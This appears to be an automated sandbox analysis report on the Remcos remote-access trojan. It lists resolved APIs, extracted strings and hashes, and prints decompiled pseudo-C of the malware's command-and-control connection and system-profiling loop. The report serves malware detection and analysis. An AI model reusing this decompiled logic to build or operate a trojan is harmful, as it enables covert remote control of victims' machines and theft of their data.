                0x0040e1e4
                0x0040e1fd
                0x0040e200
                0x0040e217
                0x0040e21a
                0x0040e230
                0x0040e233
                0x0040e246
                0x0040e249
                0x0040e262
                0x0040e264
                0x0040e271
                0x0040e286
                0x0040e28b
                0x0040e29e
                0x0040e2a7
                0x0040e2ac
                0x0040e2ac
                0x0040e264
                0x0040e2b1
                0x0040e2b5
                0x0040e446
                0x0040e44e
                0x0040e455
                0x0040e45d
                0x0040e47b
                0x0040e47d
                0x0040e482
                0x0040e492
                0x0040e497
                0x00000000
                0x0040e2bb
                0x0040e2bb
                0x0040e2c2
                0x0040e34a
                0x0040e2c4
                0x0040e2cf
                0x0040e2ea
                0x0040e2f3
                0x0040e2f8
                0x0040e2fa
                0x0040e2ff
                0x0040e31c
                0x0040e336
                0x0040e33b
                0x0040e33b
                0x0040e354
                0x0040e35e
                0x0040e366
                0x0040e368
                0x0040e36e
                0x0040e371
                0x0040e373
                0x0040e382
                0x0040e375
                0x0040e378
                0x0040e37d
                0x0040e37d
                0x0040e390
                0x0040e396
                0x0040e39d
                0x0040e3a5
                0x0040e3b0
                0x0040e3cf
                0x0040e3d5
                0x0040e3da
                0x0040e3dd
                0x0040e3e6
                0x0040e3eb
                0x0040e3f7
                0x0040e3f9
                0x0040e49c
                0x0040e49c
                0x0040e4a9
                0x0040e4ae
                0x0040e4b4
                0x0040e4b9
                0x0040e4c8
                0x0040e4ca
                0x0040e4cf
                0x0040e4e3
                0x0040e4e8
                0x0040e4ee
                0x0040e4f0
                0x0040e50d
                0x0040e50f
                0x0040e515
                0x0040e511
                0x0040e511
                0x00000000
                0x0040e511
                0x0040e4f2
                0x0040e4f2
                0x0040e4f4
                0x0040e4f4
                0x0040e503
                0x0040e509
                0x0040e509
                0x0040e51b
                0x0040e525
                0x0040e52a
                0x0040e534
                0x0040e539
                0x0040e53e
                0x0040e54c
                0x0040e569
                0x0040e574
                0x0040e579
                0x0040e57b
                0x0040e59a
                0x0040e5ac
                0x0040e5cb
                0x0040e5e0
                0x0040e5e3
                0x0040e61e
                0x0040e61e
                0x0040e5e5
                0x0040e5e7
                0x0040e5ee
                0x0040e5f0
                0x0040e5fa
                0x0040e601
                0x0040e60b
                0x0040e617
                0x0040e61a
                0x0040e61a
                0x0040e620
                0x0040e635
                0x0040e638
                0x0040e63c
                0x0040e643
                0x0040e64d
                0x0040e655
                0x0040e657
                0x0040e65f
                0x0040e668
                0x0040e668
                0x0040e66c
                0x0040e66f
                0x0040e671
                0x0040e671
                0x0040e686
                0x0040e689
                0x0040e68f
                0x0040e69d
                0x0040e6b2
                0x0040e6b7
                0x0040e6ca
                0x0040e6d3
                0x0040e6e2
                0x0040e6e4
                0x0040e6e4
                0x0040e6f9
                0x0040e6fc
                0x0040e715
                0x0040e724
                0x0040e729
                0x0040e72c
                0x0040e72f
                0x0040e732
                0x0040e732
                0x0040e73b
                0x0040e746
                0x0040e74f
                0x0040e754
                0x0040e759
                0x0040e75b
                0x0040e75e
                0x0040e75e
                0x0040e76a
                0x0040e76c
                0x0040e773
                0x0040e77f
                0x0040e77f
                0x0040e781
                0x0040e788
                0x0040e794
                0x0040e794
                0x0040e796
                0x0040e79b
                0x0040e79b
                0x0040e79d
                0x0040e7ab
                0x00000000
                0x0040e79f
                0x0040e79f
                0x0040e7a2
                0x0040e7a4
                0x0040e7b0
                0x0040e7c4
                0x0040e7d3
                0x0040e7d8
                0x0040e7e4
                0x0040e7e4
                0x0040e7a2
                0x0040e7e9
                0x0040e7fc
                0x0040e801
                0x0040e802
                0x0040e804
                0x0040e82b
                0x0040e836
                0x0040e83f
                0x0040e844
                0x0040e863
                0x0040e864
                0x0040e866
                0x0040e868
                0x00000000
                0x00000000
                0x0040e84c
                0x0040e84f
                0x0040e853
                0x0040e853
                0x0040e854
                0x0040e85e
                0x00000000
                0x0040e85e
                0x00000000
                0x0040e84f
                0x00000000
                0x0040e86a
                0x00000000
                0x0040e3ff
                0x0040e403
                0x0040e408
                0x0040e40b
                0x0040e40f
                0x0040e414
                0x0040e419
                0x0040e41c
                0x0040e41e
                0x00000000
                0x0040e420
                0x0040e420
                0x00000000
                0x0040e420
                0x0040e41e
                0x0040e3f9
                0x0040e14a
                0x0040e14a
                0x0040e422
                0x0040e422
                0x00000000
                0x0040e422
                0x0040e061
                0x0040e07b
                0x0040e084
                0x0040e08d
                0x0040e0a1
                0x0040e0aa
                0x0040e0ac
                0x0040e87d
                0x0040e887
                0x0040e88c
                0x0040e8aa
                0x0040e8b4
                0x0040e8b9
                0x0040e8bd
                0x0040e8c2
                0x0040e8c2
                0x0040e8c7
                0x0040e8cc
                0x0040e8cd
                0x0040e8ce
                0x0040e8d3
                0x0040e8d8
                0x0040fc1a
                0x0040dd91
                0x0040dd9d
                0x00000000
                0x00000000
                0x00000000
                0x0040e0ac
                0x0040df4d
                0x0040df4d
                0x0040df4e
                0x0040df56
                0x0040df5a
                0x0040df61
                0x0040df6b
                0x0040df72
                0x0040df74
                0x0040df78
                0x0040df7d
                0x0040df81
                0x0040df86
                0x0040df8a
                0x0040df91
                0x0040e423
                0x0040e427
                0x0040e434
                0x0040e434

                APIs
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4DE
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B4E7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040DEE5), ref: 0041B4FE
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B501
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B513
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B516
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040DEE5), ref: 0041B52C
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B52F
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040DEE5), ref: 0041B540
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B543
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040DEE5), ref: 0041B558
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B55B
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040DEE5), ref: 0041B56C
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B56F
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040DEE5), ref: 0041B57B
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B57E
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040DEE5), ref: 0041B590
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B593
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040DEE5), ref: 0041B5A0
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5A3
                  • Part of subcall function 0041B4C9: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040DEE5), ref: 0041B5B4
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5B7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040DEE5), ref: 0041B5C4
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5C7
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040DEE5), ref: 0041B5D9
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5DC
                  • Part of subcall function 0041B4C9: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040DEE5), ref: 0041B5E9
                  • Part of subcall function 0041B4C9: GetProcAddress.KERNEL32(00000000), ref: 0041B5EC
                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 0040DEF2
                • OpenMutexA.KERNEL32 ref: 0040E0E6
                  • Part of subcall function 0041047A: __EH_prolog.LIBCMT ref: 0041047F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologMutexNameOpen
                • String ID: 2G$ 2G$ 2G$ 2G$ 2G$82G$82G$82G$82G$82G$82G$82G$82G$@-G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Exe$Inj$P2G$Remcos Agent initialized$Software\$User$del$del$exepath$h2G$h2G$licence$license_code.txt$p3G$Cqt
                • API String ID: 1897280938-2901791990
                • Opcode ID: 39ffb3baf458eec66fc9998632b3f73d0fd22f7ba3a45d8b3a70bcdc926ec4fd
                • Instruction ID: 9e1fa40da8247c9b585ea9a59a3a54fb039144435d37588c5c456d259acc364f
                • Opcode Fuzzy Hash: 39ffb3baf458eec66fc9998632b3f73d0fd22f7ba3a45d8b3a70bcdc926ec4fd
                • Instruction Fuzzy Hash: 3532E670B0434167DA14BB729C57B6E26998F81708F04487FB946BB2E3EE7C8D45839E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00414271 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 805sleepnetworkCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 451 414271-4142b9 call 4020bf call 41a40e call 4020bf call 401e45 call 401f8b call 43a3ac 464 4142c8-414314 call 402073 call 401e45 call 4020d6 call 41a976 call 40487e call 401e45 call 40af37 451->464 465 4142bb-4142c2 Sleep 451->465 480 414316-414385 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 464->480 481 414388-414423 call 402073 call 401e45 call 4020d6 call 41a976 call 401e45 * 2 call 406292 call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 464->481 465->464 480->481 534 414433-41443a 481->534 535 414425-414431 481->535 536 41443f-4144d1 call 405a86 call 4052fe call 408832 call 402ef0 call 402073 call 41a04a call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 414230 534->536 535->536 563 4144d3-414517 WSAGetLastError call 41b45a call 4052dd call 402073 call 41a04a call 401fb8 536->563 564 41451c-41452a call 40480d 536->564 585 414dd5-414de7 call 404e06 call 4021da 563->585 569 414557-414565 call 404f31 call 4048a8 564->569 570 41452c-414552 call 402073 * 2 call 41a04a 564->570 581 41456a-41456c 569->581 570->585 584 414572-4146c5 call 401e45 * 2 call 4052fe call 408832 call 402ef0 call 408832 call 402ef0 call 402073 call 41a04a call 401fb8 * 4 call 41a33b call 413904 call 4086d0 call 440751 call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4129e0 581->584 581->585 651 4146c7-4146d4 call 405a86 584->651 652 4146d9-414700 call 401f8b call 41288e 584->652 600 414de9-414e09 call 401e45 call 401f8b call 43a3ac Sleep 585->600 601 414e0f-414e17 call 401e6d 585->601 600->601 601->481 651->652 658 414702-414704 652->658 659 414707-414d48 call 40415e call 40d28d call 41a79d call 41a879 call 41a6e9 call 401e45 GetTickCount call 41a6e9 call 41a641 call 41a6e9 call 41a5f1 call 41a879 * 5 call 40ee14 call 41a879 call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408832 call 402ef0 call 408832 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408853 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408832 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 7 call 402e81 call 404a81 call 401fb8 * 50 call 401ee9 call 401fb8 * 5 call 401ee9 call 404bf0 652->659 658->659 901 414d4a-414d51 659->901 902 414d5c-414d63 659->902 901->902 905 414d53-414d55 901->905 903 414d65-414d6a call 40a5c4 902->903 904 414d6f-414da1 call 405a4b call 402073 * 2 call 41a04a 902->904 903->904 916 414da3-414dae 904->916 917 414db5-414dd0 call 401fb8 * 2 call 401ee9 904->917 905->902 916->917 917->585
                C-Code - Quality: 89%
                			E00414271() {
				char _v16;
				char _v40;
				char _v64;
				char _v76;
				char _v100;
				char _v124;
				char _v136;
				void* _v159;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				char _v496;
				char _v520;
				char _v544;
				char _v568;
				char _v592;
				char _v616;
				char _v640;
				char _v664;
				char _v688;
				char _v712;
				char _v736;
				char _v760;
				char _v784;
				char _v808;
				char _v832;
				char _v856;
				char _v880;
				char _v904;
				char _v928;
				char _v952;
				char _v976;
				char _v1000;
				char _v1024;
				char _v1048;
				char _v1072;
				char _v1096;
				char _v1120;
				char _v1144;
				char _v1168;
				char _v1192;
				char _v1216;
				char _v1240;
				char _v1264;
				char _v1288;
				char _v1312;
				char _v1336;
				char _v1360;
				char _v1384;
				char _v1408;
				char _v1432;
				char _v1456;
				char _v1480;
				char _v1504;
				char _v1528;
				char _v1552;
				char _v1576;
				char _v2580;
				signed int _t177;
				void* _t179;
				long _t184;
				void* _t186;
				void* _t189;
				void* _t197;
				char* _t208;
				void* _t210;
				void* _t211;
				struct _SECURITY_ATTRIBUTES* _t212;
				struct _SECURITY_ATTRIBUTES* _t214;
				void* _t216;
				long _t221;
				void* _t222;
				void* _t223;
				void* _t237;
				void* _t245;
				void* _t246;
				struct _SECURITY_ATTRIBUTES* _t249;
				intOrPtr* _t252;
				void* _t255;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t265;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t273;
				void* _t274;
				void* _t275;
				intOrPtr* _t379;
				void* _t395;
				void* _t401;
				void* _t403;
				void* _t405;
				void* _t407;
				char* _t409;
				long _t413;
				void* _t414;
				struct _SECURITY_ATTRIBUTES* _t415;
				char* _t443;
				char* _t487;
				void* _t678;
				void* _t690;
				void* _t749;
				signed short _t751;
				void* _t760;
				void* _t761;
				void* _t762;
				void* _t763;
				void* _t764;
				void* _t765;
				void* _t766;
				void* _t767;
				void* _t768;
				void* _t769;
				void* _t770;
				void* _t771;
				void* _t775;
				void* _t776;
				void* _t777;
				void* _t778;
				void* _t779;
				void* _t780;
				void* _t781;
				void* _t782;
				void* _t783;
				void* _t784;
				long _t786;

				_push(_t414);
				_push(_t753);
				E004020BF(_t414,  &_v100);
				E0041A40E( &_v280, _t678);
				E004020BF(_t414,  &_v1576);
				_t749 = 0x473298;
				_t177 = E0043A3AC(_t175, E00401F8B(E00401E45(0x473298, _t678, _t760, _t784, 0x29)));
				if(_t177 != 0) {
					_t413 = _t177 * 0x3e8;
					_t786 = _t413;
					Sleep(_t413);
				}
				_t762 = _t761 - 0x18;
				E00402073(_t414, _t762, _t678, _t760, 0x46a630);
				_t179 = E00401E45(_t749, _t678, _t760, _t786, 0);
				_t763 = _t762 - 0x18;
				E004020D6(_t414, _t763, _t678, _t786, _t179);
				E0041A976( &_v76, _t678);
				_t764 = _t763 + 0x30;
				_t415 = 0; // executed
				E0040487E(); // executed
				E00401E45(_t749, _t678, _t760, _t786, 0x3a);
				_t679 = 0x464074;
				_t184 = E0040AF37(_t786);
				_t787 = _t184;
				if(_t184 != 0) {
					E00401E45(_t749, 0x464074, _t760, _t787, 0x3a);
					_t401 = E0040245C();
					_t403 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x3a));
					E00401E45(_t749, 0x464074, _t760, _t787, 0x39);
					_t405 = E0040245C();
					_t407 = E00401F8B(E00401E45(_t749, 0x464074, _t760, _t787, 0x39));
					E00401E45(_t749, 0x464074, _t760, _t787, 0x38);
					_t409 = E0040245C();
					_t753 = _t409;
					E00401F8B(E00401E45(_t749, _t679, _t760, _t787, 0x38));
					_t679 = _t409;
					E0040471D(0, _t409, _t760, _t407, _t405, _t403, _t401);
					_t764 = _t764 + 0x10;
				}
				L4:
				_t765 = _t764 - 0x18;
				 *0x473519 = 1;
				E00402073(_t415, _t765, _t679, _t760, 0x46a634);
				_t186 = E00401E45( &_v76, _t679, _t760, _t787, _t415);
				_t766 = _t765 - 0x18;
				E004020D6(_t415, _t766, _t679, _t787, _t186);
				E0041A976( &_v16, _t679);
				_t767 = _t766 + 0x30;
				_t189 = E00401E45( &_v16, _t679, _t760, _t787, 1);
				E00401FC2(0x47351c, _t191, _t753, E00402EF0(_t415,  &_v40, E00406292( &_v64, E00401E45( &_v16, _t679, _t760, _t787, 0), _t760, 0x46a634), _t760, _t787, _t189));
				E00401FB8();
				E00401FB8();
				E00401E45( &_v16, _t191, _t760, _t787, 2);
				_t682 = "0";
				_t197 = E00405AE5("0");
				_t443 =  &_v100;
				_t788 = _t197;
				if(_t197 == 0) {
					 *0x470ae4 = 1;
					_push("TLS On ");
				} else {
					 *0x470ae4 = 0;
					_push("TLS Off");
				}
				L00405A86(_t415, _t443, _t682);
				_t768 = _t767 - 0x18;
				E00402EF0(_t415, _t768, E00408832(_t415,  &_v40, E004052FE( &_v64, "Connecting  | ", _t760,  &_v100), _t749, _t760, _t788, " | "), _t760, _t788, 0x47351c);
				_t769 = _t768 - 0x14;
				E00402073(_t415, _t769, _t201, _t760, "i");
				E0041A04A(_t415, _t749);
				_t764 = _t769 + 0x30;
				E00401FB8();
				E00401FB8();
				_t208 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 1));
				_t210 = E00401F8B(E00401E45( &_v16, _t201, _t760, _t788, 0));
				_t679 = _t208;
				_t211 = E00414230(_t210, _t208,  &_v64,  &_v64);
				_t789 = _t211;
				if(_t211 == 0) {
					_t753 = 0x4734e8;
					_t212 = E0040480D(0x4734e8);
					__eflags = _t212;
					if(_t212 != 0) {
						E00404F31(0x4734e8, 0x3c, 0); // executed
						_t214 = E004048A8(0x4734e8, 0x4734e8, 0x4734e8); // executed
						__eflags = _t214;
						if(__eflags != 0) {
							_t222 = E00401E45( &_v16, _t679, _t760, __eflags, 1);
							_t770 = _t764 - 0x18;
							_t223 = E00401E45( &_v16, _t679, _t760, __eflags, 0);
							_t690 = E00408832(_t415,  &_v124, E00402EF0(_t415,  &_v208, E00408832(_t415,  &_v232, E004052FE( &_v256, "Connected   | ", _t760,  &_v100), _t749, _t760, __eflags, " | "), _t760, __eflags, _t223), _t749, _t760, __eflags, 0x46a634);
							E00402EF0(_t415, _t770, _t690, _t760, __eflags, _t222);
							_t771 = _t770 - 0x14;
							E00402073(_t415, _t771, _t690, _t760, "i");
							E0041A04A(_t415, _t749);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							_v160 = 0;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_t237 = E0041A33B( &_v256);
							_push(_t690);
							E00413904( &_v160, "%I64u", _t237);
							E004086D0(_t415,  &_v40, _t690, __eflags, 0x4730a0);
							E00440751( &_v40,  *0x46f9d0,  &_v136, 0xa);
							E004020D6(_t415,  &_v184, _t690, __eflags, E00401E45(0x473298, _t690, _t760, __eflags, 1));
							_t245 = E0040245C();
							_t246 = E00401F8B(0x473280);
							_t487 = 0x473238;
							_t691 = E00401F8B(0x473238);
							_t249 = E004129E0(_t248, "name",  &_v2580, 0x104, _t246, _t245);
							_t775 = _t771 + 0x60;
							__eflags = _t249;
							if(_t249 != 0) {
								_t487 =  &_v184;
								L00405A86(_t415, _t487, _t691,  &_v2580);
							}
							_push(_t487);
							E0041288E( &_v64, 0x80000001, E00401F8B(0x473238), "hlight");
							_t252 =  *0x470d58; // 0x0
							_t776 = _t775 + 0xc;
							_t751 = 0;
							__eflags = _t252;
							if(__eflags != 0) {
								_t751 =  *_t252() & 0x0000ffff;
							}
							E0040415E(_t415,  &_v124, 0x80000001, _t760, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe");
							_t255 = E0041A79D( &_v1552, E0040D28D(__eflags));
							_t777 = _t776 - 0x18;
							_t258 = E0041A879(_t415,  &_v1528, 0x473220);
							_t259 = E0041A6E9(_t415,  &_v1504, _t751 & 0x0000ffff);
							_t260 = E00401E45( &_v16, _t751 & 0x0000ffff, _t760, __eflags, 0);
							_t263 = E0041A6E9(_t415,  &_v1480, GetTickCount());
							_t265 = E0041A6E9(_t415,  &_v1456, E0041A641( &_v1480));
							_t268 = E0041A879(_t415,  &_v1408, E0041A5F1(_t415,  &_v1432, 0x472ec8));
							_t269 = E0041A879(_t415,  &_v1384, 0x472d40);
							_t270 = E0041A879(_t415,  &_v1360,  &_v124);
							_t271 = E0041A879(_t415,  &_v1336,  &_v40);
							_t273 = E0041A879(_t415,  &_v1312, 0x473618);
							_t274 = E0040EE14( &_v1288);
							_t275 = E0041A879(_t415,  &_v1264, 0x4732a4);
							_t679 = E00402EF0(_t415,  &_v256, E00402EF0(_t415,  &_v232, E00402EF0(_t415,  &_v208, E00402EF0(_t415,  &_v304, E00402EF0(_t415,  &_v328, E00402EF0(_t415,  &_v352, E00402EF0(_t415,  &_v376, E00402E81( &_v400, E00402EF0(_t415,  &_v424, E00402E81( &_v448, E00402EF0(_t415,  &_v472, E00402EF0(_t415,  &_v496, E00402EF0(_t415,  &_v520, E00402EF0(_t415,  &_v544, E00402EF0(_t415,  &_v568, E00408832(_t415,  &_v592, E00402EF0(_t415,  &_v616, E00402E81( &_v640, E00402EF0(_t415,  &_v664, E00402E81( &_v688, E00402EF0(_t415,  &_v712, E00408853(_t415,  &_v736, E00402EF0(_t415,  &_v760, E00402E81( &_v784, E00402EF0(_t415,  &_v808, E00402E81( &_v832, E00402EF0(_t415,  &_v856, E00402E81( &_v880, E00402EF0(_t415,  &_v904, E00402E81( &_v928, E00402EF0(_t415,  &_v952, E00408832(_t415,  &_v976, E00402EF0(_t415,  &_v1000, E00408832(_t415,  &_v1024, E00402EF0(_t415,  &_v1048, E00402E81( &_v1072, E00402EF0(_t415,  &_v1096, E00402EF0(_t415,  &_v1120, E00402EF0(_t415,  &_v1144, E00402E81( &_v1168, E00402EF0(_t415,  &_v1192, E00402E81( &_v1216, E00402F11( &_v1240,  &_v184, _t760, 0x472ec8), _t275), _t760, __eflags, 0x472ec8), _t274), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473950), _t760, __eflags, 0x472ec8), _t273), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v160), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags, "4.6.0 Pro"), _t760, __eflags, 0x472ec8), _t271), _t760, __eflags, 0x472ec8), _t270), _t760, __eflags, 0x472ec8), _t269), _t760, __eflags, 0x472ec8), _t268), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  *0x46f9d4 & 0x000000ff), _t760, __eflags, 0x472ec8), _t265), _t760, __eflags, 0x472ec8), _t263), _t760, __eflags, 0x472ec8), 0x472ec8, _t760, __eflags,  &_v136), _t760, __eflags, 0x472ec8), _t760, __eflags, _t260), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x473268), _t760, __eflags, 0x472ec8), _t259), _t760, __eflags, 0x472ec8), _t258), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v280), _t760, __eflags, 0x472ec8), _t760, __eflags, 0x4732d4), _t760, __eflags, 0x472ec8), _t760, __eflags,  &_v64), _t760, __eflags, 0x472ec8);
							E00402E81(_t777, _t318, _t255);
							_t753 = 0x4734e8;
							_push(0x4b);
							E00404A81(0x4734e8, _t318, __eflags);
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401FB8();
							E00401EE9();
							E00404BF0(0x4734e8, _t318, E00414E1C, 1);
							_t379 =  *0x470d5c; // 0x0
							__eflags = _t379;
							if(_t379 != 0) {
								__eflags =  *0x470d4a;
								if( *0x470d4a != 0) {
									_t379 =  *_t379();
									 *0x470d4a = 0;
								}
							}
							__eflags =  *0x47308a;
							if( *0x47308a != 0) {
								_t379 = E0040A5C4(_t415, 0x473040, _t679);
							}
							E00405A4B(_t379);
							_t778 = _t777 - 0x18;
							E00402073(_t415, _t778, _t679, _t760, "Disconnected");
							_t779 = _t778 - 0x18;
							E00402073(_t415, _t779, _t679, _t760, "!");
							E0041A04A(_t415, 0x472ec8);
							_t764 = _t779 + 0x30;
							__eflags =  *0x472acb;
							if( *0x472acb != 0) {
								__eflags = 0;
								CreateThread(0, 0, E00419872, 0, 0, 0);
							}
							E00401FB8();
							E00401FB8();
							E00401EE9();
							_t749 = 0x473298;
						}
					} else {
						_t780 = _t764 - 0x18;
						E00402073(_t415, _t780, _t679, _t760, "Connection Error: Unable to create socket");
						_t781 = _t780 - 0x18;
						E00402073(_t415, _t781, _t679, _t760, "E");
						E0041A04A(_t415, _t749);
						_t764 = _t781 + 0x30;
					}
				} else {
					__imp__#111();
					_t395 = E0041B45A( &_v40, _t211);
					_t782 = _t764 - 0x18;
					_t679 = "Connection Error: ";
					E004052DD(_t415, _t782, "Connection Error: ", _t760, _t789, _t395);
					_t783 = _t782 - 0x14;
					E00402073(_t415, _t783, "Connection Error: ", _t760, "E");
					E0041A04A(_t415, _t749);
					_t764 = _t783 + 0x30;
					E00401FB8();
					_t753 = 0x4734e8;
				}
				E00404E06(_t679);
				_t415 =  &(_t415->nLength);
				_t216 = E004021DA( &_v76);
				_t790 = _t415 - _t216;
				if(_t415 >= _t216) {
					_t415 = 0;
					_t221 = E0043A3AC(_t218, E00401F8B(E00401E45(_t749, _t679, _t760, _t790, 2))) * 0x3e8;
					_t787 = _t221;
					Sleep(_t221); // executed
				}
				E00401E6D( &_v16, _t679);
				goto L4;
			}
















































































































































                0x0041427d
                0x0041427e
                0x00414280
                0x0041428b
                0x00414296
                0x0041429b
                0x004142b1
                0x004142b9
                0x004142bb
                0x004142bb
                0x004142c2
                0x004142c2
                0x004142c8
                0x004142d2
                0x004142db
                0x004142e0
                0x004142e6
                0x004142ee
                0x004142f3
                0x004142f6
                0x004142f8
                0x00414301
                0x00414306
                0x0041430d
                0x00414312
                0x00414314
                0x0041431a
                0x00414321
                0x00414332
                0x0041433c
                0x00414343
                0x00414354
                0x0041435e
                0x00414365
                0x0041436e
                0x00414377
                0x0041437c
                0x00414380
                0x00414385
                0x00414385
                0x00414388
                0x00414388
                0x0041438b
                0x00414399
                0x004143a2
                0x004143a7
                0x004143ad
                0x004143b5
                0x004143ba
                0x004143c2
                0x004143f3
                0x004143fb
                0x00414403
                0x0041440d
                0x00414412
                0x00414419
                0x0041441e
                0x00414421
                0x00414423
                0x00414433
                0x0041443a
                0x00414425
                0x00414425
                0x0041442c
                0x0041442c
                0x0041443f
                0x00414444
                0x00414474
                0x00414479
                0x00414483
                0x00414488
                0x0041448d
                0x00414493
                0x0041449b
                0x004144ae
                0x004144c1
                0x004144c6
                0x004144ca
                0x004144cf
                0x004144d1
                0x0041451c
                0x00414523
                0x00414528
                0x0041452a
                0x0041455d
                0x00414565
                0x0041456a
                0x0041456c
                0x00414577
                0x0041457c
                0x0041458c
                0x004145d3
                0x004145d7
                0x004145dc
                0x004145e6
                0x004145eb
                0x004145f6
                0x00414601
                0x0041460c
                0x00414617
                0x0041461c
                0x0041462b
                0x0041462c
                0x0041462d
                0x0041462e
                0x0041462f
                0x00414630
                0x00414635
                0x00414643
                0x00414653
                0x00414667
                0x00414682
                0x0041468e
                0x00414696
                0x004146b2
                0x004146b9
                0x004146bb
                0x004146c0
                0x004146c3
                0x004146c5
                0x004146ce
                0x004146d4
                0x004146d4
                0x004146d9
                0x004146ef
                0x004146f4
                0x004146f9
                0x004146fc
                0x004146fe
                0x00414700
                0x00414704
                0x00414704
                0x0041470f
                0x00414721
                0x00414726
                0x00414750
                0x00414764
